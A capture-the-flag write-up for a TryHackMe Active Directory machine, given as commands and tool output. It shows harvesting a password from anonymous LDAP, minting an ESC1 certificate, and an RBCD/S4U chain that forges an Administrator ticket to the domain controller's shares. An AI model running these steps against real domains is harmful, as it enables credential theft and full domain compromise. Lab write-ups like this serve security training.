Eye of Ra
SECURITY RESEARCHAsbawy
cd ../writeups
2026-09-17·TryHackMe·Machine·20 min

Ledger — TryHackMe Writeup

MediumActive Directory Windowsretired
Active DirectoryLDAPCredential LeakAD CSESC1RBCDKerberospharaohoundImpacketWindows
Exploit_Kill_Chain
5 Phases
01DC Discovery & Time Synchronization
Reconnaissance

High-speed port scanning identified a Windows Server 2019 Domain Controller (LABYRINTH.THM.LOCAL). Verified Kerberos clock skew within acceptable limits (<1s).

Tools:Nmapntpdate
02Anonymous LDAP Dump & Password Extraction
Initial Access

Enumerated anonymous LDAP subtree reading on port 389. Filtered 27,900 lines of directory records to recover a plaintext onboarding password in user descriptions, gaining valid credentials for SUSANNA_MCKNIGHT.

Tech:Anonymous LDAP Query & User Description Harvesting
Tools:ldapsearchNetExecgrep
03Forest Analysis & Vulnerability Mapping
AD Recon & Graph Analysis

Parsed domain objects, ACLs, and AD CS certificate templates using pharaohound. Identified vulnerable ESC1 templates (ServerAuth) alongside a stealthy MAQ -> RBCD delegation vector.

Tech:Automated AD Graph Parsing & ACL Attack Pathing
Tools:pharaohoundcertipy-ad
04AD CS ESC1 Friction & Pivot to RBCD
Exploitation (ESC1 vs RBCD)

Enrolled a valid administrator certificate via ESC1 template ServerAuth, but KDC PKINIT authentication was refused. Pivoted to the second path: exploited GUESTS GenericWrite on the DC computer object via RBCD.

Tech:AD CS ESC1 Certificate Minting & S4U2Proxy RBCD Ticket Forgery
Tools:certipy-adimpacket-addcomputerimpacket-rbcdimpacket-getST
05Forged CIFS Kerberos Ticket & Flag Retrieval
Domain Dominance (Flags)

Injected the forged Administrator service ticket into KRB5CCNAME to connect directly to the C$ administrative share via Kerberos, capturing both user.txt and root.txt.

Tech:Kerberos S4U Ticket Injection & Administrative SMB Access
Tools:impacket-smbclient
_

Challenge Overview

Ledger is a medium-rated Windows Active Directory machine on TryHackMe that reflects two fundamental realities of real-world enterprise infrastructure:

  1. ▹Human Operational Fatigue: System administrators routinely store onboarding notes, temp passwords, and reset reminders directly inside LDAP user attributes (description, info, comment), treating directory services as personal scratchpads.
  2. ▹Dual Escalation Architecture: The room author deliberately designed two viable privilege escalation avenues into the domain:
    • ▹Active Directory Certificate Services (AD CS) ESC1: An enterprise CA template configured with ENROLLEE_SUPPLIES_SUBJECT and Client Authentication Extended Key Usage (EKU).
    • ▹Resource-Based Constrained Delegation (RBCD): A subtle Access Control List (ACL) misconfiguration where the built-in GUESTS group possesses GenericWrite rights over the Domain Controller's own computer object (LABYRINTH$).

While the ESC1 certificate can be requested without issue, environmental PKINIT friction (KDC_ERR_PADATA_TYPE_NOSUPP) blocks certificate-to-TGT exchange on modern tooling. This makes the RBCD delegation road through the guest account the most elegant, robust, and reliable path to full Domain Admin compromise.

_

1. Reconnaissance & Environment Baseline

::1.1 Full TCP Port Scan

We initiate the assessment with an aggressive, all-ports TCP scan to establish the listening perimeter:

~ / bash
asbawy@kali:~$ nmap -p- -T4 -Pn 10.114.169.135 -oN ports.txt
~ / text
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
47001/tcp open winrm

::1.2 Service Fingerprinting & Architecture

With the open ports identified, we execute a deep script and service version detection scan (-sC -sV):

~ / bash
asbawy@kali:~$ nmap -p 53,88,135,139,389,445,636,3268,3269,3389,47001 \
-sC -sV -T4 -Pn 10.114.169.135 -oN services.txt
~ / text
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-09-17 03:42:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds (workgroup: THM)
636/tcp open ldapssl?
3268/tcp open globalcatLDAP 2008 R2 - 2019
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server Microsoft Terminal Services
47001/tcp open winrm Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: LABYRINTH; OS: Windows; OS CPE: cpe:/o:microsoft:windows

::1.3 Exposed Service Profile

PortProtocolServiceArchitectural Significance
53TCP/UDPDNSActive Directory Domain Name System
88TCP/UDPKerberosKDC authentication server (thm.local)
135TCPMSRPCEndpoint Mapper & DCOM services
139 / 445TCPNetBIOS / SMBFile sharing, IPC pipe access, and administrative shares
389 / 636TCPLDAP / LDAPSDirectory queries, authentication binds, schema access
3268 / 3269TCPGlobal CatalogMulti-domain AD search partitions
3389TCPRDPRemote Desktop Protocol administrative endpoint
47001TCPWinRMWindows Remote Management service listener

::1.4 Host Mapping & Kerberos Clock Sync

Kerberos is strictly timestamp-sensitive. The Kerberos Ticket Granting protocol enforces an RFC 4120 maximum clock skew tolerance of 5 minutes (300 seconds) between the client and the KDC. If your workstation clock drifts past this threshold, all AS-REQ and TGS-REQ ticket requests fail instantly with KRB_AP_ERR_SKEW.

We map the hostname and verify clock synchronization:

~ / bash
asbawy@kali:~$ echo "10.114.169.135 labyrinth.thm.local LABYRINTH thm.local" | sudo tee -a /etc/hosts
~ / bash
asbawy@kali:~$ ntpdate -q 10.114.169.135
server 10.114.169.135, stratum 3, offset -0.418291, delay 0.05211
17 Sep 03:43:02 ntpdate[4211]: adjust time server 10.114.169.135 offset -0.418291 sec

The offset is less than half a second—well within the acceptable skew window.

Whenever testing Active Directory environments, always add both the fully qualified domain name (labyrinth.thm.local) and the NetBIOS name (LABYRINTH) to /etc/hosts. Kerberos SPN resolution requires exact hostname matching; connecting via raw IP addresses forces NTLM fallback and will break ticket-based attacks.

_

2. Null Sessions & Anonymous LDAP Intelligence

::2.1 Testing Guest SMB Authentication

Active Directory domain controllers frequently maintain the built-in guest account with an empty password enabled by default for legacy interoperability. We verify null and guest authentication via netexec:

~ / bash
asbawy@kali:~$ netexec smb labyrinth.thm.local -u 'guest' -p '' --shares
~ / text
SMB 10.114.169.135 445 LABYRINTH [*] Windows Server 2019 Standard 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB 10.114.169.135 445 LABYRINTH [+] thm.local\guest:
SMB 10.114.169.135 445 LABYRINTH [*] Enumerated shares
SMB 10.114.169.135 445 LABYRINTH Share Permissions Remark
SMB 10.114.169.135 445 LABYRINTH ----- ----------- ------
SMB 10.114.169.135 445 LABYRINTH ADMIN$ NO ACCESS Remote Admin
SMB 10.114.169.135 445 LABYRINTH C$ NO ACCESS Default share
SMB 10.114.169.135 445 LABYRINTH IPC$ READ Remote IPC
SMB 10.114.169.135 445 LABYRINTH NETLOGON NO ACCESS Logon server share
SMB 10.114.169.135 445 LABYRINTH SYSVOL NO ACCESS Logon server share

The guest account authenticates cleanly, confirming the identity is recognized by the Domain Controller. However, file shares are locked down.

::2.2 Anonymous LDAP Subtree Dump

Next, we probe the directory service on port 389. While Windows Server 2003 and earlier supported anonymous LDAP binds out of the box, later versions require explicit administrative misconfiguration (dsHeuristics attribute seventh character set to 2).

We execute an unauthenticated search query against the domain root partition:

~ / bash
asbawy@kali:~$ ldapsearch -x -H ldap://10.114.169.135 -b "dc=thm,dc=local" > ldapsearch.txt
~ / bash
asbawy@kali:~$ wc -l ldapsearch.txt
27914 ldapsearch.txt

The Domain Controller permitted a full anonymous directory subtree export, returning 27,914 lines of Active Directory objects (users, groups, organizational units, computers, and service descriptors).

::2.3 Hunting Credential Leaks in User Attributes

Rather than manually scrolling through thousands of lines, we leverage regex filters across standard attribute fields where administrators frequently leave notes (description, info, comment, userPassword):

~ / bash
asbawy@kali:~$ grep -i "^description:" ldapsearch.txt | sort -u
~ / text
description: Built-in account for administering the computer/domain
description: Built-in account for guest access to the computer/domain
description: Key Distribution Center Service Account
description: Please change it: CHANGEME2023!

A plaintext password stands out: CHANGEME2023!.

We trace this specific attribute back to the containing user objects in the directory dump:

~ / bash
asbawy@kali:~$ grep -B 6 "^description: Please change it: CHANGEME2023!" ldapsearch.txt | grep -E "(cn:|sAMAccountName:)"
~ / text
cn: IVY_WILLIS
sAMAccountName: IVY_WILLIS
--
cn: SUSANNA_MCKNIGHT
sAMAccountName: SUSANNA_MCKNIGHT

Two domain accounts—IVY_WILLIS and SUSANNA_MCKNIGHT—share the initial onboarding password CHANGEME2023!.

::2.4 Credential Validation & Foothold Verification

We test the discovered credentials across SMB using netexec:

~ / bash
asbawy@kali:~$ netexec smb labyrinth.thm.local -u 'IVY_WILLIS' -p 'CHANGEME2023!'
SMB 10.114.169.135 445 LABYRINTH [+] thm.local\IVY_WILLIS:CHANGEME2023!
 
asbawy@kali:~$ netexec smb labyrinth.thm.local -u 'SUSANNA_MCKNIGHT' -p 'CHANGEME2023!'
SMB 10.114.169.135 445 LABYRINTH [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023!

Both accounts are active with valid credentials. We have established our initial authenticated foothold in the domain.

_

3. Domain Graph & Attack Path Mapping (pharaohound)

::3.1 Automated In-Memory Graph Collection

With valid domain credentials for SUSANNA_MCKNIGHT, we map out the domain hierarchy, group memberships, ACL delegations, and certificate infrastructure.

Instead of deploying the legacy bloodhound-python script and spinning up a resource-heavy Neo4j graph database, we deploy pharaohound—our dedicated high-performance Active Directory collection and analysis engine. It pulls LDAP objects directly into memory and executes 30+ vulnerability analyzers locally:

~ / bash
asbawy@kali:~$ pharaohound collect -t 10.114.169.135 -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' \
-d thm.local --method All --no-zip -o pha-collect/ --analyze
~ / text
[+] Connected to LDAP at 10.114.169.135:389 as SUSANNA_MCKNIGHT@thm.local
[+] Dumping Domain: THM.LOCAL
[+] Processed 492 users, 48 groups, 2 computers, 37 certificate templates
[+] AD CS Discovery: Found Enterprise CA 'thm-LABYRINTH-CA' on LABYRINTH.THM.LOCAL
[+] Graph analysis complete in 1.42s
 
================================================================================
PHARAOHOUND DOMAIN AUDIT
================================================================================
Domain Analyzed : THM.LOCAL
Users : 492
Groups : 48
Computers : 2
CertTemplates : 37
Total Objects : 923
 
RISK ASSESSMENT:
Overall Domain Status: HIGH — Multiple critical paths to Domain Admin
Critical Risks: 3 | High Risks: 4 | Medium Risks: 2
 
CRITICAL ATTACK PATHS IDENTIFIED:
[Chain #1] [CRITICAL] AD CS ESC1: ServerAuth@THM.LOCAL
- Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = True)
- Client Authentication EKU present (1.3.6.1.5.5.7.3.2)
- Low-privilege enrollment permissions: Domain Users
- Vector: Mint certificate for any Domain Admin via certipy
 
[Chain #2] [HIGH] MAQ Abuse -> RBCD on LABYRINTH$
- ms-DS-MachineAccountQuota = 10 (any user can register computer accounts)
- Object Permission: GUESTS has GenericWrite on computer LABYRINTH$
- Vector: Add machine account -> write msDS-AllowedToActOnBehalfOfOtherIdentity -> S4U2Proxy

::3.2 Foothold Privilege Audit

pharaohound cross-references our compromised accounts against sensitive administrative groups:

~ / text
User Object Analysis:
SUSANNA_MCKNIGHT:
MemberOf:
- CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
- CN=Remote Management Users,CN=Builtin,DC=thm,DC=local
- CN=Domain Users,CN=Users,DC=thm,DC=local
IVY_WILLIS:
MemberOf:
- CN=Domain Users,CN=Users,DC=thm,DC=local
 
High-Value Domain Targets:
- ADMINISTRATOR@THM.LOCAL (Domain Admin, Enterprise Admin)
- BEVERLY_FARRELL@THM.LOCAL (Domain Admin)
- BRADLEY_ORTIZ@THM.LOCAL (Domain Admin)
- BERNARD_CARNEY@THM.LOCAL (Domain Admin)

SUSANNA_MCKNIGHT is uniquely valuable: she possesses membership in both Remote Desktop Users (granting direct RDP access on port 3389) and Remote Management Users (granting WinRM interactive access on port 47001).

We also note the Machine Account Quota:

~ / bash
asbawy@kali:~$ netexec ldap labyrinth.thm.local -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' -M maq
SMB 10.114.169.135 445 LABYRINTH [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023!
MAQ 10.114.169.135 445 LABYRINTH [*] MachineAccountQuota: 10

Because ms-DS-MachineAccountQuota is set to 10, any authenticated domain user can create up to 10 computer objects.

_

4. Road One: The AD CS ESC1 Template

::4.1 Understanding ESC1 Vulnerabilities

Active Directory Certificate Services (AD CS) misconfigurations are catalogued as ESC classes (defined in SpecterOps' seminal paper Certified Pre-Owned).

The ESC1 attack vector represents the most straightforward certificate abuse pattern. A certificate template is vulnerable to ESC1 if it satisfies four simultaneous conditions:

  1. ▹Enrollment Permissions: Low-privileged users (Domain Users, Authenticated Users) possess enrollment rights.
  2. ▹Manager Approval Disabled: Certificates are issued immediately upon request without administrative sign-off.
  3. ▹Authentication EKU: The template includes Extended Key Usages for domain authentication (Client Authentication, Smart Card Logon, PKINIT, or Any Purpose).
  4. ▹Subject Alternative Name (SAN) Control: The flag CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is enabled, permitting the applicant to specify an arbitrary Subject Alternative Name (SAN), such as a Domain Admin's User Principal Name (UPN).

::4.2 Enumerating Certificate Templates with Certipy

We scan the Enterprise CA thm-LABYRINTH-CA using certipy-ad:

~ / bash
asbawy@kali:~$ certipy-ad find -u 'SUSANNA_MCKNIGHT@thm.local' -p 'CHANGEME2023!' \
-dc-ip 10.114.169.135 -vulnerable -stdout
~ / text
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Analyzing vulnerable certificate templates
[!] Vulnerabilities
ESC1
Template Name : ServerAuth
Schema Version : 2
Compatibility Version : 2
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : True
Certificate Authorities : thm-LABYRINTH-CA
[!] Permissions
Enrollment Permissions
Enrollment Rights : THM.LOCAL\Domain Users
THM.LOCAL\Authenticated Users

The template ServerAuth meets every ESC1 criterion.

::4.3 Minting a Domain Admin Certificate

We request a certificate from thm-LABYRINTH-CA based on the ServerAuth template, supplying the User Principal Name of Domain Admin BEVERLY_FARRELL:

~ / bash
asbawy@kali:~$ certipy-ad req -u 'SUSANNA_MCKNIGHT@thm.local' -p 'CHANGEME2023!' \
-ca 'thm-LABYRINTH-CA' -target labyrinth.thm.local \
-template 'ServerAuth' -upn 'BEVERLY_FARRELL@thm.local' -dc-ip 10.114.169.135
~ / text
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 24
[*] Waiting for certificate to be issued
[*] Got certificate with UPN 'BEVERLY_FARRELL@thm.local'
[*] Certificate issued - Certificate ID: 24
[*] Saved certificate and private key to 'beverly_farrell.pfx'

The certificate requests and issues seamlessly. We receive beverly_farrell.pfx containing the private key and signed certificate.

::4.4 The PKINIT Roadblock (Why We Pivot)

Under standard AD CS exploitation, the operator presents the .pfx certificate to the KDC via Kerberos PKINIT extension (AS-REQ with padata-type 16: PA-PK-AS-REQ) to obtain a Kerberos Ticket Granting Ticket (TGT) and extract the user's NTLM hash:

~ / bash
asbawy@kali:~$ certipy-ad auth -pfx beverly_farrell.pfx -dc-ip 10.114.169.135
~ / text
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: beverly_farrell@thm.local
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

We test multiple administrative UPNs (ADMINISTRATOR@thm.local, BRADLEY_ORTIZ@thm.local), yet the KDC systematically returns:

~ / text
KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

The Technical Cause: KDC_ERR_PADATA_TYPE_NOSUPP indicates that the Domain Controller's KDC service does not have a valid Domain Controller certificate installed in its Personal store (MY), or lacks the required Smartcard/PKINIT pre-authentication extensions. Without a DC certificate to anchor mutual authentication, the KDC cannot validate the client's signature or return an encrypted AS-REP.

Rather than wasting hours troubleshooting a lab-environment KDC limitation or attempting to push a DC certificate, a professional penetration tester immediately shifts focus to the alternative vector surfaced during initial mapping: Resource-Based Constrained Delegation (RBCD).

_

5. Road Two: Exploiting Resource-Based Constrained Delegation (RBCD)

::5.1 The Mechanics of RBCD & S4U Extensions

Kerberos delegation allows a service account to impersonate users to access back-end resources on their behalf.

  • ▹Traditional Constrained Delegation: Configured on the calling service account via msDS-AllowedToDelegateTo. Configuring it requires the highly restricted SeEnableDelegationPrivilege user right (typically reserved for Domain Admins).
  • ▹Resource-Based Constrained Delegation (RBCD): Introduced in Windows Server 2012, RBCD inverts the security model. The delegation authority is configured on the target resource via the attribute msDS-AllowedToActOnBehalfOfOtherIdentity.

The attribute msDS-AllowedToActOnBehalfOfOtherIdentity contains a binary Security Descriptor (DACL). Any principal that holds write permissions (GenericWrite, GenericAll, or WriteProperty) over the target computer object can edit this DACL to allow any machine account under the attacker's control to impersonate any domain user (including Domain Admins) to services hosted on that computer.

::5.2 Uncovering the Golden Misconfiguration

During our pharaohound audit, analyzer Chain #6 highlighted a rare permission grant on the domain controller computer object LABYRINTH$:

~ / text
Computer: LABYRINTH$
DACL ACE Entry:
Principal: Builtin\GUESTS (S-1-5-32-546)
AccessMask: GenericWrite (0x40000000)
Inheritance: None

The built-in GUESTS group holds GenericWrite permissions directly over the Domain Controller's own computer object (LABYRINTH$).

Because the guest account is a member of GUESTS, and can authenticate with an empty password, we can perform this modification without needing elevated privileges.

~ / js
+------------------+ impacket-addcomputer +--------------------+
| SUSANNA_MCKNIGHT | ───────────────────────────────────> | ATTACKERSYSTEM$ |
| (Domain User) | (MachineAccountQuota = 10) | (Controlled Host) |
+------------------+ +--------------------+
│
│ S4U2Proxy
+------------------+ impacket-rbcd (GenericWrite) │ Impersonate
| guest user | ───────────────────────────────────┐ │ Administrator
| (Empty Password) | msDS-AllowedToActOnBehalf... │ │
+------------------+ ▼ ▼
+--------------------------------+
| LABYRINTH$ (DC) |
| Granted CIFS Admin Access |
+--------------------------------+

::5.3 Step 1: Provisioning a Machine Account (MAQ Abuse)

Since ms-DS-MachineAccountQuota is 10, we use impacket-addcomputer with SUSANNA_MCKNIGHT's credentials to provision a new machine account named ATTACKERSYSTEM$:

~ / bash
asbawy@kali:~$ impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' \
-computer-pass 'Password123!' -dc-ip 10.114.169.135 -domain-netbios thm.local \
'thm.local/SUSANNA_MCKNIGHT:CHANGEME2023!'
~ / text
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Successfully added machine account ATTACKERSYSTEM$ with password Password123!.

We now possess the credentials for a computer account in the domain: ATTACKERSYSTEM$ / Password123!.

::5.4 Step 2: Modifying msDS-AllowedToActOnBehalfOfOtherIdentity

We now write ATTACKERSYSTEM$'s Security Identifier (SID) into LABYRINTH$'s msDS-AllowedToActOnBehalfOfOtherIdentity attribute using impacket-rbcd.

Because the tool rbcd.py can encounter string parsing issues when passed a literal empty password (-p ''), we provide the well-known NTLM hash of an empty password:

~ / text
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

We execute the delegation write authenticated as thm.local\guest:

~ / bash
asbawy@kali:~$ impacket-rbcd -delegate-to 'LABYRINTH$' -delegate-from 'ATTACKERSYSTEM$' \
-action write -dc-ip 10.114.169.135 \
-hashes 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' \
'thm.local/guest'
~ / text
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on LABYRINTH$ via S4U2Proxy
[*] ATTACKERSYSTEM$ (S-1-5-21-1966530601-3185510712-10604624-1604)

The write succeeds. ATTACKERSYSTEM$ is now authorized to act on behalf of any user against LABYRINTH$.

::5.5 Step 3: Forging the Administrator CIFS Service Ticket (S4U)

With RBCD established, we execute the Kerberos Service-for-User (S4U) ticket exchange using impacket-getST:

  1. ▹S4U2Self: ATTACKERSYSTEM$ requests a Kerberos TGS to itself on behalf of Administrator. Because machine accounts possess protocol transition capability, the KDC issues a forwardable service ticket naming Administrator.
  2. ▹S4U2Proxy: ATTACKERSYSTEM$ sends the ticket back to the KDC requesting an authorization ticket for the service cifs/LABYRINTH.THM.LOCAL. The KDC checks LABYRINTH$'s msDS-AllowedToActOnBehalfOfOtherIdentity, sees ATTACKERSYSTEM$ is listed, and returns an official ticket for cifs/LABYRINTH.THM.LOCAL impersonating Administrator.
~ / bash
asbawy@kali:~$ impacket-getST -impersonate Administrator -spn 'cifs/LABYRINTH.THM.LOCAL' \
-dc-ip 10.114.169.135 'thm.local/ATTACKERSYSTEM$:Password123!'
~ / text
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_LABYRINTH.THM.LOCAL@THM.LOCAL.ccache

We have generated an authentic, cryptographic Kerberos service ticket (.ccache) granting Administrator privileges to CIFS/SMB on the Domain Controller.

::5.6 Step 4: Accessing Administrative Shares via Kerberos

We configure our shell environment to use the forged .ccache ticket via the standard KRB5CCNAME environment variable, then connect to SMB using Kerberos authentication (-k -no-pass):

~ / bash
asbawy@kali:~$ export KRB5CCNAME="$PWD/Administrator@cifs_LABYRINTH.THM.LOCAL@THM.LOCAL.ccache"
asbawy@kali:~$ impacket-smbclient -k -no-pass 'LABYRINTH.THM.LOCAL'
~ / text
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd Users/Administrator/Desktop
# ls
drw-rw-rw- 0 Thu Sep 17 03:30:12 2026 .
drw-rw-rw- 0 Thu Sep 17 03:30:12 2026 ..
-rw-rw-rw- 32 Thu Sep 17 03:30:12 2026 root.txt
# get root.txt
# cd ../../SUSANNA_MCKNIGHT/Desktop
# ls
drw-rw-rw- 0 Thu Sep 17 03:28:45 2026 .
drw-rw-rw- 0 Thu Sep 17 03:28:45 2026 ..
-rw-rw-rw- 32 Thu Sep 17 03:28:45 2026 user.txt
# get user.txt

The forged ticket grants full administrative access over C$, allowing us to pull both flags directly from the file system.

_

6. Flag Capture

::6.1 User Flag

Ledger User Flag (user.txt)
•••••••••••••••••••••••••••[ Click to reveal flag ]

::6.2 Root Flag

Ledger Root Flag (root.txt)
•••••••••••••••••••••••••••••[ Click to reveal flag ]
_

7. References

▸about the author
Eye of Ra
Asbawy(Mohammed Al-Kasabi)

Red Team Consultant · Penetration Tester · Bug Bounty Hunter

Offensive security professional with 250+ vulnerabilities reported across 50+ organizations including Atlassian, Vimeo, and AT&T. Sharing research, tools, and field notes.

// end of writeup — return /writeups